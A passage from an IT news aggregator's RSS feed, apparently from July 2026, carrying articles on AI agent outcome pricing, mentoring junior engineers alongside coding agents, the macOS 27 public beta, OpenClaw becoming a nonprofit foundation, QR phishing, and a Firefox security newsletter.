<li><strong>Definition, baseline, guardrails. </strong>Make “resolved” mean what your users experience, measured against a baseline you have captured yourself, and tie it to metrics you own — first-contact resolution, reopen rate, time-to-resolution. Expect procurement to resist because pinning this down slows the deal. Hold the line; it is the whole ballgame.</li>



<li><strong>Real agent, or agent washing. </strong>Gartner reckons only a sliver of self-described agentic vendors are the genuine article. Make them prove it: Production resolution on accounts like yours, and the human-escalation rate sitting behind that number. Not a demo.</li>



<li><strong>Auditability, as a gate. </strong>SOC 2 at minimum, increasingly ISO 42001 or NIST AI RMF alignment, plus model cards, decision logs and an incident-response plan they have actually tested. If they can’t show how data is walled off between their acquired entities, or how an agent’s decision gets traced, they aren’t ready for anything regulated. This belongs in the shortlist criteria, not the post-mortem.</li>



<li><strong>Where autonomy stops. </strong>Decide which actions an agent can take alone and which need a human, how it hands off with context and who is accountable when it acts on its own. Put names against it before go-live.</li>



<li><strong>The exit. </strong>An embedded agent platform gets stickier than the staffed incumbent it replaced, faster than you would think. Lock down data portability, knowledge-base ownership and a way out while you are still the one with leverage.</li>



<li><strong>Capacity, not just cost. </strong>The best outcome here often isn’t a smaller bill. It is the demand that your old service levels were quietly turning away. Nobody answered the tickets. The cases that aged out. Ask what fixing that is worth before you optimize purely for headcount.</li>
</ol>



<h2 class="wp-block-heading">The move</h2>



<p class="wp-block-paragraph">Outcome pricing is where this lands, and on balance, that is progress. But in the near term, it hands the advantage to whoever can measure the outcome — and in most shops, that isn’t the buyer. The edge isn’t picking the cleverest challenger or the safest incumbent. It is being able to hold any of them to a result, on your numbers. Look again at why Gartner thinks so many of these projects die: Not the technology — cost, fuzzy value, weak controls. Our side of the table. So, start there. Take one high-volume, measurable workflow, pilot it against a baseline you own, instrument it with your own metrics, and treat the muscle you build doing that as the real deliverable. Get it right and the pricing model stops mattering. Skip it, and you have just agreed to pay for someone else’s definition of done.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How do you go from junior to staff engineer when AI writes the code?]]></title>
<description><![CDATA[A few weeks ago, a new hire at Aviator, fresh out of college, asked me a question I didn’t have a clean answer to. How do I become a senior engineer, or even a staff engineer? What should I learn, and how?



It’s a fair question and a harder one to answer than it was just a year ago.



The path...]]></description>
<link>https://tsecurity.de/de/3667712/it-security-nachrichten/how-do-you-go-from-junior-to-staff-engineer-when-ai-writes-the-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667712/it-security-nachrichten/how-do-you-go-from-junior-to-staff-engineer-when-ai-writes-the-code/</guid>
<pubDate>Tue, 14 Jul 2026 13:08:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A few weeks ago, a new hire at Aviator, fresh out of college, asked me a question I didn’t have a clean answer to. How do I become a senior engineer, or even a staff engineer? What should I learn, and how?</p>



<p class="wp-block-paragraph">It’s a fair question and a harder one to answer than it was just a year ago.</p>



<p class="wp-block-paragraph">The path used to be well-known. As a newly hired junior software engineer, you were given an experienced mentor who would assign you simple tasks to learn the ropes. You’d write some code, ask plenty of questions, open a pull request, get feedback in code review, think about it and fix your code. Rinse and repeat that a few hundred times. The tasks became more complex; the feedback got shorter and along the way you’ve been building judgment, the thing that separates a senior engineer from a junior one.</p>



<p class="wp-block-paragraph">Now AI writes most of the code. The loop looks different and the easy assumption is that it’s broken: fewer tasks for juniors to cut their teeth on, an agent fixing the code that another agent wrote, thinner path to judgment.</p>



<h2 class="wp-block-heading"><a></a>Mentoring got easier, not harder</h2>



<p class="wp-block-paragraph">I knew just the person to ask: how do we grow senior and staff engineers in the AI era? Adam Berry is a staff engineer at Netflix, a member of <a href="https://dx.community/">The Hangar</a>, our community of engineering leaders, and someone I have been discussing the evolving role of code review and <a href="https://www.cio.com/article/4179485/ai-killed-the-code-review-what-happens-to-knowledge-sharing.html">knowledge sharing</a> for a while now. He spends his time on getting AI adoption right, rather than just fast, in their engineering organization and has been working out the question of growing new engineers in practice. Mentoring juniors in an agentic world, Adam says, isn’t harder; it’s embarrassingly easy.</p>



<p class="wp-block-paragraph">“You grow juniors and help them become better engineers the same way you always did. AI isn’t changing the methodology. It’s changing the details,” he told me. His point is that the agentic world gives a lot more options for giving juniors bounded tasks to work on and more feedback. The scattered remarks and comments seniors used to give in person now can be put into instructions and guardrails.</p>



<p class="wp-block-paragraph">Adam breaks working with agents into three foundational skills:</p>



<ul class="wp-block-list">
<li>If you don’t know how to do something with the agent, ask the agent.</li>



<li>If the agent does something you don’t like, figure out how to correct it and then codify it so it doesn’t happen again.</li>



<li>Your sense of when the agent has gone off the rails.<br><br></li>
</ul>



<p class="wp-block-paragraph">“Most juniors can pick up the first two on their own. On the third one, they need guidance, he says.<br><br></p>



<p class="wp-block-paragraph">His process for building it is staged. “The stages are about growing scope. First, you give a junior engineer a well-specified task—and these are now bigger than what you’d have given a junior before. You can give them task definitions that are like a prompt and instructions to drive that prompt, make sure they got to a good plan, make sure they understood the plan, and that they thought through the test cases, etc.<br><br>Then gradually you peel off some of that specificity so they have to build the muscle themselves. Once they’ve gotten good at that level of scope, they’re ready to work on larger scoped problems.”<br><br>Starting from more specific problems and going towards ambiguous problems is the definition of growing as an engineer.</p>



<h2 class="wp-block-heading"><a></a>Pair programming with the agent in the room</h2>



<p class="wp-block-paragraph">Seniors can still do pairing sessions with juniors, now with the agent in the room.<br><br>“In the pairing session, the earlier-career engineer should be the one driving. The agent can be set up to interrogate the junior rather than just answer them. None of you is manually writing code, but you’re still doing pair programming and mentoring. Even if it’s just a trivial bug fix, if you guide a junior through it, it forces them to do just that little bit of thinking.”<br><br>Adam says mentoring juniors today does not have to mean forcing them to write code manually. Seniors should teach them the process of agentic engineering, and that’s exactly what they should focus on during the pairing sessions. The habit he wants to be installed early is asking for options instead of answers.<br><br>“I aim to teach juniors to ask for options and think through them, even on small tasks. I ask them to explain what their input to the AI tool was that led to the code they got. But I’d also show them how I would have done the same thing.”<br><br>The pairing produces artifacts as it goes. “That’s where you get into conversations of, ‘This is why that wasn’t quite it for me,’ and if I see that that’s not baked into the repo, I’m going to add this into the ADR, into the design, into the instruction set. I’ll codify that so the junior gets it too, and they know why it exists, because they watched me go through it with the tool myself.”</p>



<p class="wp-block-paragraph">That reshapes the code review instead of removing it. Making that work puts more on senior engineers, not less. “Senior engineers need to ensure that things like ADRs, or whatever system you use, are properly encapsulated in the repo for both the agents and the humans to consume.” His team also attaches the prompts to the pull request and has the agent summarize what it did against what the prompt asked.<br><br></p>



<p class="wp-block-paragraph">Adam also teaches junior engineers how to bring in expert sources from outside into AI tools. He’ll point an agent at a book like Michael Feathers’ <em>Working with Legacy Code</em> as an example of what quality code looks like and have it work from the concepts directly.</p>



<h2 class="wp-block-heading"><a></a>Don’t outsource the thinking</h2>



<p class="wp-block-paragraph">His arguments make sense, but I also recently came across <a href="https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=11363384">research</a> examining the influence of AI tools on how and why members of software engineering teams interact. Their finding was not surprising: of the 131 surveyed developers, 51% said they now ask GenAI for technical help they once would have asked a person, and 62% said it was easier to ask GenAI without fear of embarrassment.</p>



<p class="wp-block-paragraph">When a junior gets stuck now, their first move usually isn’t to message a senior on Slack. It’s to ask the agent. This is also the case in code reviews. The purpose of code reviews was always <a href="https://www.cio.com/article/4179485/ai-killed-the-code-review-what-happens-to-knowledge-sharing.html">knowledge sharing </a>as much as it was a quality gate. What I see junior engineers do now is take the feedback and, without reading it closely, hand it straight to the agent to resolve. The part where they would have to understand how their work differed from what the senior expected disappears. It got passed from the reviewer to the agent, and the junior skipped the understanding.</p>



<p class="wp-block-paragraph">This isn’t really the junior’s fault. They need the motivation and the space to do it differently, and the default pattern under delivery pressure is to push the thing out and worry about it later.<br><br>The same research showed that developers turned to colleagues with questions about context (65% to clarify business logic or requirements, 50% for how something had been done before).</p>



<p class="wp-block-paragraph">Respondents were also aware of the trap that Berry’s approach was created to avoid: AI tends to hand back a single answer, compared to multiple perspectives a colleague surfaces and they kept seeking teammates for context-specific expertise, mentorship and plain social connection.</p>



<p class="wp-block-paragraph"><br>The fix is almost mechanical: if you have to make a choice, you have to think about it. I do this in my own product thinking. Most of it happens by bouncing ideas off Claude, but whenever something is complex, I make myself lay out a few options, trade them against each other and decide which direction to take. That’s the same move Berry wants juniors making, and it’s what builds judgment, whether you’re twenty-two or forty.</p>



<h2 class="wp-block-heading"><a></a>Why we should still hire juniors</h2>



<p class="wp-block-paragraph">There’s also a hiring question underneath all of this. We recently hosted Kent Beck, an industry legend, at <a href="https://dx.community/">the Hanga</a>r in a session we called “Juniors FTW,” and his reasoning was that the industry is being remade fast enough that being new is an advantage. Juniors are too new to have absorbed what everyone “knows” is impossible, which leaves them less biased, more creative and carrying fewer preconceived mental barriers.</p>



<p class="wp-block-paragraph">Beck also <a href="https://newsletter.kentbeck.com/p/hey-n00b-we-didnt-hire-you-to-complete">wrote</a> about how important it is to hire juniors without the calculation of how many tasks they can perform.<br><br>“If all we cared about was today’s productivity, we wouldn’t have hired you at all. Instead, we (the seniors) are focused on the future: we know there’s going to be far more work here than we could possibly accomplish. We are paying your salary now as the option premium on the engineer you will become. If we play this game right, we’ll have a kick-ass next generation of engineers. If not, we’ll have to be doing the same engineering jobs ten years from now, and we really don’t want to be doing that.”</p>



<h2 class="wp-block-heading"><a></a>The pipeline is thinning</h2>



<p class="wp-block-paragraph">The trend is running the other way. Entry-level hiring at the 15 biggest tech firms fell 25 percent from 2023 to 2024, according to a <a href="https://www.signalfire.com/blog/signalfire-state-of-talent-report-2025">report from SignalFire</a>. In a recent <a href="https://stackoverflow.blog/2025/12/26/ai-vs-gen-z/">survey of engineering leaders</a>, a majority said they plan to hire fewer juniors, on the logic that AI lets seniors cover more ground.</p>



<p class="wp-block-paragraph">That logic is short-sighted in a specific way. Senior engineers don’t appear from nowhere. They’re the juniors someone hired five or ten years ago and invested in mentoring them. Stop hiring and growing juniors now, and the gap doesn’t show up this year. It shows up later, when the industry needs people with the judgment that only comes from years of making mistakes and recovering from them and finds it stopped producing them.</p>



<p class="wp-block-paragraph">So, here’s the answer to the question that the new hire asked: the path to senior and to staff is the same path it always was. You grow the range of ambiguity you can handle, and you stay honest about the part you can’t handle yet. What changed is the interface. The agent writes the code. Your job is to keep asking questions to your colleagues and the agents and keep doing the thinking until the thinking is good.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases macOS 27 Golden Gate Public Beta With Big AI Features]]></title>
<description><![CDATA[Apple has released the first public beta of macOS 27 Golden Gate, allowing users outside the developer program to test the update before its full release later this year. The public beta follows three developer beta releases and includes the new Siri AI experience, design refinements, improved se...]]></description>
<link>https://tsecurity.de/de/3666613/ios-mac-os/apple-releases-macos-27-golden-gate-public-beta-with-big-ai-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666613/ios-mac-os/apple-releases-macos-27-golden-gate-public-beta-with-big-ai-features/</guid>
<pubDate>Tue, 14 Jul 2026 02:08:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released the first public beta of macOS 27 Golden Gate, allowing users outside the developer program to test the update before its full release later this year. The public beta follows three developer beta releases and includes the new Siri AI experience, design refinements, improved search, and several Apple Intelligence upgrades.



Since this is pre-release software, users should expect bugs, compatibility problems, increased battery use, and occasional performance issues. Apple recommends installing beta software on a secondary Mac or a separate partition rather than a work or business-critical computer.



How to install macOS 27 Golden Gate public beta



Back up your Mac before installing the update so you can protect your files if something goes wrong.




Visit the Apple Beta Software Program website and sign in using your Apple Account.



Enrol your Mac in the public beta program.



Open System Settings on your Mac.



Select General, followed by Software Update.



Click the information button next to Beta Updates.



Choose macOS 27 Golden Gate Public Beta from the menu.



Click Done and wait for the update to appear.



Select Update Now and follow the on-screen instructions.




The installation can take some time, and your Mac may restart several times during the process.



Everything new in macOS 27 Golden Gate public beta




New Siri AI experience: Siri now works as a more capable conversational assistant and supports natural follow-up questions. It can search the web, provide detailed answers, and help with tasks across supported apps.



Personal context searches: Siri can search information stored in apps such as Mail, Messages, Notes, and Photos. For example, users can ask Siri to locate an old email, find a particular photo, or retrieve information shared in a conversation.



Dedicated Siri app: macOS 27 introduces a separate Siri app that stores conversations in one place. Users can continue previous conversations, start new ones, and access Siri through Spotlight using Command + Space.



Visual Intelligence on Mac: Siri can examine content displayed on the screen and answer questions about it. This can help users understand documents, images, webpages, and other visible information.



Improved Spotlight search: Apple has updated the search system to deliver more reliable results across files, apps, emails, and messages. Users can also access Siri AI directly through Spotlight.



Updated Liquid Glass design: The update reduces excessive transparency and improves the way complex backgrounds appear behind menus and windows. Apple has also added more depth between interface elements, making it easier to identify the active window.



Transparency controls: Users can adjust the amount of system transparency using a new slider, providing more control over the Liquid Glass appearance.



More consistent windows and toolbars: Apps now use more consistent corner shapes, toolbar layouts, headings, and controls. Sidebars extend to the edges of windows instead of appearing as floating panels.



Writing tools powered by Siri: The updated writing tools can generate text, correct grammar, rewrite existing content, and offer feedback on drafts.



New Photos editing features: Apple Intelligence adds tools that can clean up unwanted objects, adjust image framing, and extend photos beyond their original borders.



Natural-language Shortcuts: Users can describe an automation in normal language, and the Shortcuts app will create the required actions without needing every step to be added manually.



Improved Mail and Messages search: Search results inside Mail and Messages are more accurate, making it easier to locate older conversations and information.



Safari extension builder: macOS 27 can create basic Safari extensions from natural-language instructions, reducing the amount of manual development required.



Updated iPhone Mirroring: The iPhone Mirroring app supports more flexible screen sizes and aspect ratios, making iPhone apps easier to view on a Mac.



Performance improvements: Apple has made system-level changes to improve responsiveness, display rendering, memory management, and CPU use, including on older supported Macs.




The first macOS 27 Golden Gate public beta gives users an early look at Apple’s upcoming Mac features, though bugs and unfinished tools remain possible throughout the testing period. If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’]]></title>
<description><![CDATA[OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that the popular platform has thus far lacked. Still, some worry about the risks created by the move. 



“Our ambition is for OpenClaw...]]></description>
<link>https://tsecurity.de/de/3666484/it-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666484/it-nachrichten/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai/</guid>
<pubDate>Mon, 13 Jul 2026 23:17:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenClaw’s announcement that it has become a nonprofit foundation is generating IT excitement because of the potential for governance and development consistency that <a href="https://www.computerworld.com/article/4128257/openclaw-the-ai-agent-thats-got-humans-taking-orders-from-bots.html" target="_blank">the popular platform </a>has thus far lacked. Still, some worry about the risks created by the move. </p>



<p class="wp-block-paragraph">“Our ambition is for OpenClaw to be the Switzerland of AI. Neutral ground where every model and every lab can plug into the technology and collaborate on standards in the era of agents,” <a href="https://openclaw.ai/blog/introducing-openclaw-foundation/" target="_blank" rel="noreferrer noopener">OpenClaw said in a post</a>. “That work is already underway in Foundation-convened councils on agent identity, agent profiles, evals, and enterprise deployment.”</p>



<p class="wp-block-paragraph">The statement, co-authored by OpenClaw creator <a href="https://www.linkedin.com/in/steipete/" target="_blank" rel="noreferrer noopener">Peter Steinberger</a>, pointed out, “the great open source projects of our time — Linux, Apache, Mozilla — endure because a neutral steward stands behind them. That is the role we are taking on to keep OpenClaw MIT licensed, open, and independent so that everyone building on it can trust it will be here for the long term.”</p>



<p class="wp-block-paragraph">But it reassured users that the original OpenClaw leadership is still in charge.</p>



<p class="wp-block-paragraph">“Peter built this thing and Peter keeps making the calls, especially the technical ones. Since joining OpenAI earlier this year, he has continued to steward OpenClaw as an open and independent project, and OpenAI has made a commitment to keep it that way,” the post said. “The foundation is here to serve: good governance, stable funding, and paying the people who keep the claws alive.”</p>



<p class="wp-block-paragraph">However, some analysts and consultants were skeptical about how much true independence Steinberger would have, given his salaried role with OpenAI. </p>



<h2 class="wp-block-heading">Neutrality claim in question</h2>



<p class="wp-block-paragraph">“The Switzerland of AI neutrality claim collapses under its own announcement,” said <a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520. “OpenAI runs a team [at OpenAI] called Claw Labs that Peter leads and OpenAI is a major donor to OpenClaw. The ‘neutral steward’s’ chief technical decision maker is employed by one of the competing labs it is supposed to be neutral with.” To OpenAI, he said, OpenClaw is closer to a tax-exempt nonprofit subsidiary than it is to a neutral ‘Switzerland of AI.’</p>



<p class="wp-block-paragraph">He pointed out that, in addition, Microsoft is shipping <a href="https://www.computerworld.com/article/4173442/enterpriseclaw-wants-to-bring-governance-to-the-openclaw-era-2.html" target="_blank">the enterprise version</a> of OpenClaw, and Nvidia is shipping the hardware bundle. “This is being called the Switzerland of AI, but Switzerland does not have its central bank run by France,” he observed.</p>



<p class="wp-block-paragraph">Kenney said that what the new OpenClaw has actually built is “a shared dependency that several competitors fund, staff, and steer, wrapped in a nonprofit structure. Enterprise IT should understand that structure, because treating OpenClaw as neutral is a mistake,” adding that CIOs need to look at this development devoid of the emotional component. </p>



<p class="wp-block-paragraph">“There is a strategic irony here that CIOs should sit with,” Kenney said. “If OpenClaw succeeds at becoming the universal agent substrate, then every model plugs into the same identity layer, the same profiles, and the same deployment plumbing. The thing every vendor is racing to own becomes a commodity that nobody owns.” He pointed out that, in the short term, that is genuinely good news for buyers because it means less lock-in and more portability.</p>



<p class="wp-block-paragraph">“But,” he said, “when the connective tissue is free and natural, the only labs that benefit are the ones with the best models and the deepest distribution. Commoditize the layer below you and you compete on the layer where you are already strongest. The foundation is not a charity. It is the biggest players agreeing to stop fighting over the plumbing so they can fight over the water, and the enterprise is the one paying the water bill either way.”</p>



<h2 class="wp-block-heading">Good news, bad news</h2>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, liked the potential consistency that could emerge from the structural change, given the complexity of agent development today. </p>



<p class="wp-block-paragraph">“We are seeing a lot of OpenClaw variants hit the market, such as those from Nvidia as well as competing products from cloud and SaaS vendors. A common base helps solidify the common parts,” Andersen noted. “That said, a common challenge is the sustainability of these open source foundations over time. In addition to releasing code, these foundations need funding to evolve and grow. And that funding needs to come from continued momentum to incentivize existing members to increase investment and recruit new members to join.”</p>



<p class="wp-block-paragraph">Andersen stressed that IT buyers need to keep an eye on the roadmap for any OpenClaw variant they choose to deploy, “as that will directly impact the foundation, and the momentum of the foundation and common base. If the common base loses momentum, it can lead to forks, or just a loss of innovation. When that happens, members tend to back away, which puts customers in limbo.”</p>



<p class="wp-block-paragraph">But not everyone sees the promised structure as entirely good for IT.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO at coding productivity tool vendor Kodezi, said, “most CIOs do not want to bet their future entirely on a single model vendor. They want Claude for some workloads, GPT for others, open models for sensitive environments, and potentially internally fine-tuned systems for specific use cases. The problem is that every vendor currently brings its own identity system, tool interfaces, permissions model, and operational assumptions. That fragmentation does not scale.”</p>



<p class="wp-block-paragraph">He said, “the risk if standards fail is straightforward: every vendor builds its own closed ecosystem, enterprises become locked into individual stacks, and security becomes dramatically harder. The opportunity if OpenClaw succeeds is equally significant: enterprises get portable agents, common identity standards, interoperable tooling, and a healthier competitive market around models rather than ecosystems.”</p>



<h2 class="wp-block-heading">Will it remain a nonprofit?</h2>



<p class="wp-block-paragraph">However, said <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, one of the key details that IT executives will want to keep in mind is that OpenAI also began as a nonprofit, but it was quickly <a href="https://www.computerworld.com/article/4056490/openai-microsoft-discuss-shape-of-future-relationship.html" target="_blank">seen as not adhering to nonprofit objectives</a>. </p>



<p class="wp-block-paragraph">“OpenAI’s transition from a nonprofit research organization into a more complex structure highlighted the challenge of maintaining mission alignment while scaling technology, capital, partnerships, and commercial operations,” Greis said. “OpenClaw has the opportunity to address some of those governance questions earlier by establishing clear principles around neutrality, transparency, and decision-making before the ecosystem becomes even larger and more valuable.”</p>



<p class="wp-block-paragraph">He noted, “we have seen this pattern before with technologies like Linux and Kubernetes. The strongest open ecosystems succeeded because they created trusted foundations that enterprises could build upon. The technology was important, but the governance model that underpinned it was equally critical.”</p>



<h2 class="wp-block-heading">Risks are ‘squarely in IT’s lap’</h2>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, echoed Greis’ concerns. </p>



<p class="wp-block-paragraph">“CIOs shouldn’t assume that this nonprofit will always be a nonprofit, or confuse being a nonprofit with actually being neutral or unbiased,” he said. “The risks are squarely in IT’s lap: autonomous agents ‘with their own identity’ acting on a user’s behalf blow straight through traditional IAM assumptions. Issues, such as agent identity, auditability, secret handling. Identity boundaries have not yet been reliably solved. Until they are, enterprises should treat OpenClaw agents like privileged service accounts, not like a browser plugin.”</p>



<p class="wp-block-paragraph">Independent cybersecurity and risk advisor <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a> pointed to another IT exposure that might come from this OpenClaw transition: Cost.</p>



<p class="wp-block-paragraph">“OpenClaw currently has a very high token burn rate in usage, which presents a significant cost consideration for large-scale enterprise adoption,” he said. “The skills marketplace introduces <a href="https://www.csoonline.com/article/4129867/what-cisos-need-to-know-about-clawdbot-i-mean-moltbot-i-mean-openclaw.html" target="_blank">a new supply chain threat </a>that enterprises will need to manage. Threat management, and specifically handling <a href="https://www.csoonline.com/article/4135449/compromised-npm-package-silently-installs-openclaw-on-developer-machines.html" target="_blank">external marketplace elements</a>, can be highly challenging for open-source operations. Ultimately, at scale, enterprise adoption could become a difficult balancing act between managing high operational costs and securing an expanded security surface.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The macOS 27 public beta is worth it just for the Liquid Glass tweaks]]></title>
<description><![CDATA[The macOS 27 Golden Gate public beta is here, and anyone with an M-series Mac now has easier access to test-drive Apple's latest changes - including a more subdued Liquid Glass aesthetic. That's reason enough to be at least a little excited for macOS 27 (particularly if you're on Tahoe and dislik...]]></description>
<link>https://tsecurity.de/de/3666446/it-nachrichten/the-macos-27-public-beta-is-worth-it-just-for-the-liquid-glass-tweaks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666446/it-nachrichten/the-macos-27-public-beta-is-worth-it-just-for-the-liquid-glass-tweaks/</guid>
<pubDate>Mon, 13 Jul 2026 23:03:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The macOS 27 Golden Gate public beta is here, and anyone with an M-series Mac now has easier access to test-drive Apple's latest changes - including a more subdued Liquid Glass aesthetic. That's reason enough to be at least a little excited for macOS 27 (particularly if you're on Tahoe and disliking all the transparency). […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Is that QR code a trap? How to spot quishing scams before it's too late]]></title>
<description><![CDATA[A QR code phishing scheme can take many forms. Here's how to recognize them and avoid becoming a victim.]]></description>
<link>https://tsecurity.de/de/3666114/it-security-nachrichten/is-that-qr-code-a-trap-how-to-spot-quishing-scams-before-its-too-late/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666114/it-security-nachrichten/is-that-qr-code-a-trap-how-to-spot-quishing-scams-before-its-too-late/</guid>
<pubDate>Mon, 13 Jul 2026 20:08:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A QR code phishing scheme can take many forms. Here's how to recognize them and avoid becoming a victim.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Application Security Team: Firefox Security & Privacy Newsletter 2026 Q2]]></title>
<description><![CDATA[Welcome to the Q2 2026 edition of the Firefox Security & Privacy Newsletter.

Security and privacy are core principles of Mozilla’s Manifesto and remain at the heart of Firefox’s development. In this edition, we highlight some of the key security and privacy initiatives from Q2 2026, grouped into...]]></description>
<link>https://tsecurity.de/de/3665507/tools/firefox-application-security-team-firefox-security-privacy-newsletter-2026-q2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665507/tools/firefox-application-security-team-firefox-security-privacy-newsletter-2026-q2/</guid>
<pubDate>Mon, 13 Jul 2026 16:10:17 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welcome to the Q2 2026 edition of the Firefox Security &amp; Privacy Newsletter.</p>

<p>Security and privacy are core principles of <a href="https://www.mozilla.org/en-US/about/manifesto/">Mozilla’s Manifesto</a> and remain at the heart of Firefox’s development. In this edition, we highlight some of the key security and privacy initiatives from Q2 2026, grouped into the following areas:</p>

<ul>
  <li><strong>Firefox Product Security &amp; Privacy</strong>, new security and privacy features, protections, and integrations in Firefox</li>
  <li><strong>Core Security</strong>, platform security improvements, hardening efforts, and foundational enhancements</li>
  <li><strong>Community Engagement</strong>, highlights from our security research community and bug bounty program</li>
  <li><strong>Web Security &amp; Standards</strong>, progress on web technologies and standards that help websites better protect users from online threats</li>
</ul>

<h3>Preface</h3>

<p>Note: Some of the bugs linked below might not be accessible to the general public and restricted to specific work groups. <a href="https://firefox-source-docs.mozilla.org/bug-mgmt/processes/fixing-security-bugs.html#keeping-private-information-private">We de-restrict fixed security bugs after a grace-period</a>, until the majority of our user population have received Firefox updates. If a link does not work for you, please accept this as a precaution for the safety of all Firefox users.</p>

<h3>Firefox Product Security &amp; Privacy</h3>

<p><strong>Private Access Control Tokens (PACT):</strong> PACT is a cross-industry initiative designed to tackle one of the web’s most urgent challenges: enabling websites to reliably distinguish legitimate users and authorized automated agents from abusive traffic without compromising user privacy. To introduce the initiative, we published a <a href="https://hacks.mozilla.org/2026/06/pact-anonymous-credentials-for-the-web/">technical deep dive on Mozilla Hacks</a> alongside a <a href="https://blog.mozilla.org/en/privacy-security/keeping-the-web-open-and-private-in-the-bot-era/">companion Mozilla blog post</a> that explains the vision, motivation, and privacy-preserving design behind PACT.</p>

<p><strong>Qualified Website Authentication Certificates (QWACs):</strong> Firefox is prepared to meet upcoming eIDAS requirements under the <a href="https://eidas.ec.europa.eu/efda/home">EU Digital Identity Framework.</a> <a href="https://eidas.ec.europa.eu/efda/discover/qwac">Qualified Website Authentication Certificates (QWACs), as required by the framework, are supported</a> in Firefox 153 (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2043399">Bug 2043399</a>) onwards.</p>

<p><strong>Hardening Firefox with Claude Mythos:</strong> In a <a href="https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/">blogpost</a> we shared how our AI-assisted security testing pipeline, powered by Claude Mythos, uncovered and helped remediate hundreds of previously hidden vulnerabilities in Firefox, significantly strengthening the browser’s security while demonstrating the transformative potential of AI to enhance defensive cybersecurity.</p>

<p><strong>Visual Indications for Geolocation Access:</strong> In light of some web pages using geolocation for activities that are not related to their maps functionality, Firefox now displays <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2038194">a real-time visual indicator</a> whenever a web page is accessing the user’s geolocation. Starting with Firefox 153, the address bar now provides a <a href="https://bug2038194.bmoattachments.org/attachment.cgi?id=9586032">real-time visual indicator</a> the moment a website begins accessing a user’s location, providing users with  immediate awareness and greater transparency into when and how their geolocation data is being used.</p>

<p><strong>Improving Website Compatibility in Private Browsing:</strong> Starting with Firefox 152, Private Browsing Mode now offers users the option to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1994405">temporarily lower tracking protections</a> for the current tab when stricter tracker blocking could be causing a website to malfunction.  Previously, this may have resulted in users turning off privacy protections completely to continue using visited web page. With our new feature, users can quickly restore site functionality of the current tab, preserving users’ overall privacy settings.</p>

<p><strong>Instant fresh start through new <a href="https://support.mozilla.org/en-US/kb/private-browsing-use-firefox-without-history">Fire Button</a>:</strong> Firefox 151 introduced the new Fire Button for Private Browsing, giving users an instant fresh start with a single click. Instead of closing and reopening a Private Window, users can <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1846495">immediately clear all browsing data and continue browsing in a clean session</a>, making Private Browsing faster, more convenient, and just as private.</p>

